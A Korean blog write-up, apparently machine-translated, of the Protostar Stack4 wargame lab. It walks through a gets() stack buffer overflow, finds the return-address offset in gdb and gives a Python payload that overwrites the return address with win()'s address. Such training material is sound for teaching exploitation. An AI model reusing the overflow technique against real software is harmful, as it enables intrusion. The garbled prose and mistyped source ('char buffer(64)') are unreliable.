(프로토스타) 스택4
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
char buffer(64);
gets(buffer);
}1. win() 함수와 main() 함수가 존재하며 win() 함수를 실행해야만 문제가 해결된다.
2. gets(buffer)가 길이를 확인하지 않았기 때문에
버퍼 오버 플로우발생하다
3. 메인함수에는 별도의 함수 실행부가 없습니다.
ret 부분을 win() 함수의 주소로 교체합니다.
스택으로 그려보면 다음과 같습니다.
![[Protostar] Stack4 1](https://blog.kakaocdn.net/dn/deEbkG/btr1bd5gfJO/GBZpJSgY4OoN5r9KKNvrgk/img.png)
먼저 gdb로 main 함수를 보면 다음과 같습니다.
![[Protostar] Stack4 2](https://blog.kakaocdn.net/dn/bYiq6U/btr0NH7RF7E/cTXZWBKrTapfoxkQMaCJq1/img.png)
win 함수의 주소를 확인해보면,
![[Protostar] Stack4 3](https://blog.kakaocdn.net/dn/d19aCZ/btr1bfIK2Ak/57A6aTQzN9lCWz0Qi0ggvk/img.png)
0x80483f4입니다.
버퍼 64바이트 + sfp 4바이트RET에 win() 함수의 주소를 입력합니다.
![[Protostar] Stack4 4](https://blog.kakaocdn.net/dn/Q1s9N/btr0KSWbFM1/Puk6ZKu2cUgWeVyVvjRE1k/img.png)
실패합니다.
버퍼와 sfp 사이 가짜의있기 때문에
더미 값을 얻기 위해 gdb stack4에서
주요 기능에서 ret(0x0804841e)의 중단점베팅 후
입력 값은 A 64 BBBB CCCC DDDD EEEE FFFF GGGG HHHH IIII였습니다.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII
![[Protostar] Stack4 6](https://blog.kakaocdn.net/dn/c8qxSx/btr0RQ4u2vJ/VQKHaZm1alqHqP91514oh0/img.jpg)
나중에 $esp 값을 확인하면 값이 올바르게 입력되었는지 확인할 수 있습니다.
![[Protostar] Stack4 7](https://blog.kakaocdn.net/dn/bSsiAd/btr0VKppNWy/M3KBgVTTI4SC6UPQuZCaG1/img.jpg)
FastTabs로 탭의 내용을 확인할 때,
esp는 0xbffff76c이고 해당 값은 0x45454545입니다.
![[Protostar] Stack4 8](https://blog.kakaocdn.net/dn/bfxwmY/btr1fPJyCxG/tC99dB6xyJbc01UNV9b0w0/img.jpg)
$esp 포인트 업 RET왜냐하면 이 부분은 win() 함수의 주소그냥 꽂아
![[Protostar] Stack4 9](https://blog.kakaocdn.net/dn/dnv164/btr06XuYUED/9kG3TX2ucimgwbqlFVAiJ1/img.png)
페이로드의 구조는 다음과 같습니다.
(python -c ‘print “A”*64+”BBBB”+”CCCC”+”DDDD”+”\xf4\x83\x04\x08″‘) | ./stack4
실행 결과:
![[Protostar] Stack4 10](https://blog.kakaocdn.net/dn/dV87uL/btr1bl3hfNl/ZHEwIOAQiJhBzSDCA5MhH0/img.png)